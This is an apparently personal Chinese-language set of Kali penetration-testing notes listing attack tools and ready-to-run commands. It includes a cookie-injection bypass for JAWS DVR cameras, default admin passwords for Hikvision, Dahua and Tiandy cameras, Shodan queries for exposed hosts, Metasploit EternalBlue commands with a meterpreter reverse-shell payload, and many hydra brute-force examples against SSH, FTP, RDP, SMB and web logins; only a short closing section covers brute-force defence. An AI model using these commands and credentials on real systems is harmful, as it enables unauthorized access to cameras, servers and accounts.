web安全笔记-kali渗透-（比较乱主要记录工具方法）

kali更新MFS

1. 更换yum源地址
2. 添加kali数字签名
3. 如果出现无法更新建议卸载MFS之后在安装
4. sudo rm 对锁强制解锁进行安装
5. 启动数据库 postgresql 设置开机自动启动

撒旦之眼

https://www.shodan.io/

在输入框输入 prot:3389 os:windows

摄像头

JAWS/1.1

输入

document.cookie="dvr_camcnt=4";
document.cookie="dvr_usr=admin";
document.cookie="dvr_pwd=123";

在url 后面加上 10.1.1.1:8080//view2.html

摄像头2

海康威视

admin 123456

大华网络摄像机

admin 888888

天地伟业

Admin 111111

Hikvision

Server:DVRDVS-Webs

msfconsole 工具开启 (永恒之蓝)

1.开启命令

msfconsole
search ms17-010
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp
set RHOSTS *(目标ip)
set LHOST (本地ip)

nmap

nmap -sP ip地址 /24  不指定端口
	-p 指定端口
	-p-全端口
-sT TCP全连接扫描 会留下记录
扫描方法：nmap扫描类型主要有TCP的全连接扫描（会在被扫描机器留下记录），半连接扫描（不会留下记录），FIN扫描（可以判断对方操作系统的类型）。
-sS TCP半连接扫描  
-sN 隐蔽扫描
-sX 隐蔽扫描
-sF 隐蔽扫描
-O 对方系统类型 （不太准确）
-oN/oX   txt/xml

字典生成工具 crunch

参数详解

     min    设定最小字符串长度（必选）
     max    设定最大字符串长度（必选）
     
     oprions
     -b     指定文件输出的大小，避免字典文件过大  
     -c     指定文件输出的行数，即包含密码的个数
     -d     限制相同元素出现的次数
     -e     定义停止字符，即到该字符串就停止生成
     -f     调用库文件（/etc/share/crunch/charset.lst）
     -i     改变输出格式，即aaa,aab -> aaa,baa
     -I     通常与-t联合使用，表明该字符为实义字符
     -m     通常与-p搭配
     -o     将密码保存到指定文件
     -p     指定元素以组合的方式进行
     -q     读取密码文件，即读取pass.txt
     -r     定义重某一字符串重新开始
     -s     指定一个开始的字符，即从自己定义的密码xxxx开始
     -t     指定密码输出的格式
     -u     禁止打印百分比（必须为最后一个选项）
     -z     压缩生成的字典文件，支持gzip,bzip2,lzma,7z  

CUPP

CUPP是一个非常强大的工具，专门为一个人创建一个词汇表。CUPP是跨平台的，用Python编写。CUPP向您询问有关目标（姓名，妻子姓名，宠物名称......）的问题，然后根据您输入的关键字创建一个密码。

hydra (九头蛇 在线破解工具)

一、简介
hydra是著名黑客组织thc的一款开源的暴力密码破解工具，可以在线破解多种密码。
官 网：http://www.thc.org/thc-hydra。

可支持AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL , NCP, NNTP, Oracle Listener , Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP, SOCKS5, SSH (v1 and v2), Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP等类型密码。

二、安装
Hydra 安装

# wget --no-check-certificate https://www.thc.org/releases/hydra-8.1.tar.gz
# tar zxvf hydra-8.1.tar.gz 
# cd hydra-8.1 
# ./configure 
# make && make install 
 
三、参数说明 
 
hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns] 
 
[-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV] server service [OPT] 
 
-R 继续从上一次进度接着破解。 
 
-S 采用SSL链接。 
 
-s PORT 可通过这个参数指定非默认端口。 
 
-l LOGIN 指定破解的用户，对特定用户破解。 
 
-L FILE 指定用户名字典。 
 
-p PASS 小写，指定密码破解，少用，一般是采用密码字典。 
 
-P FILE 大写，指定密码字典。 
 
-e ns 可选选项，n：空密码试探，s：使用指定用户和密码试探。 
 
-C FILE 使用冒号分割格式，例如“登录名:密码”来代替-L/-P参数。 
 
-M FILE 指定目标列表文件一行一条。 
 
-o FILE 指定结果输出文件。 
 
-f 在使用-M参数以后，找到第一对登录名或者密码的时候中止破解。 
 
-t TASKS 同时运行的线程数，默认为16。 
 
-w TIME 设置最大超时的时间，单位秒，默认是30s。 
 
-v / -V 显示详细过程。 
 
server 目标ip 
 
service 指定服务名，支持的服务和协议：telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt 
http-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc 
ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec 
rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh smtp-auth[-ntlm] pcanywhere 
teamspeak sip vmauthd firebird ncp afp等等。 
 
OPT 可选项

四、各种用法实例 ：

1、破解ssh： 
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip ssh 
hydra -l 用户名 -p 密码字典 -t 线程 -o save.log -vV ip ssh 
 
 
2、破解ftp： 
hydra ip ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV 
hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV 
 
 
3、get方式提交，破解web登录： 
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get /admin/ 
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get /admin/index.php
 
 
4、post方式提交，破解web登录： 
hydra -l 用户名 -P 密码字典 -s 80 ip http-post-form "/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorry password" 
hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18 http-post-form "login.php:id=^USER^&passwd=^PASS^:<title>wrong username or password</title>" 
（参数说明：-t同时线程数3，-l用户名是admin，字典pass.txt，保存为out.txt，-f 当破解了一个密码就停止， 10.36.16.18目标ip，http-post-form表示破解是采用http的post方式提交的表单密码破解,<title>中 的内容是表示错误猜解的返回信息提示。） 
 
 
5、破解https： 
hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https 
 
 
 
6、破解teamspeak： 
hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak 
 
 
 
7、破解cisco： 
hydra -P pass.txt 10.36.16.18 cisco 
hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable 
 
 
 
8、破解smb： 
hydra -l administrator -P pass.txt 10.36.16.18 smb 
 
 
 
9、破解pop3： 
hydra -l muts -P pass.txt my.pop3.mail pop3 
 
 
 
10、破解rdp： 
hydra ip rdp -l administrator -P pass.txt -V 
 
 
 
11、破解http-proxy： 
hydra -l admin -P pass.txt http-proxy://10.36.16.18 
 
 
 
12、破解imap： 
hydra -L user.txt -p secret 10.36.16.18 imap PLAIN 
hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN

theHarvester 邮箱搜集

黑帽大牛网站 http://caidaome.com/?sort=5

SQL 注入

服务器提权 mof | udf 提权

sql注入分类

1.数字型
2.字符型

注入手法

1 联合查询注入
2 报错型注入
3 布尔型注入
4 基于时间延迟注入
5 可多语句查询注入

渗透软件

DirBuster

 DirBuster是Owasp(Open Web APPlication Security Project )开发的一款专门用于探测网站目录和文件(包括隐藏文件)的工具。由于使用java编写，电脑中要装有JDK才能运行

御剑

github地址 https://github.com/foryujian/yjdirscan

火狐工具 wappalyzer

Wappalyzer是一款能够分析目标网站所采用的平台构架、网站环境、服务器配置环境、JavaScript框架、编程语言等参数的chrome网站技术分析插件。

渗透环境搭建模型 dvwa

图片木马制作

edjpgcom 图片木马

web扫描软件

AppScan

BurpSuite

arachni

防御暴力破解

1.useradd yangge -s /sbin/nologin
2.秘密复杂性 
大小写+数字+特殊符号+20为以上+定期更换
3修改默认端口
4.限制登陆的用户组或者数据
5.使用sudo
6.基于PAM 实现登陆限制
auth required pam_tally2.so deny=2 even_deny_root root_unlock_time=60 unlock_time=6

指纹识别工具

国外指纹识别工具 whatweb

获取网站信息插件 Web Developer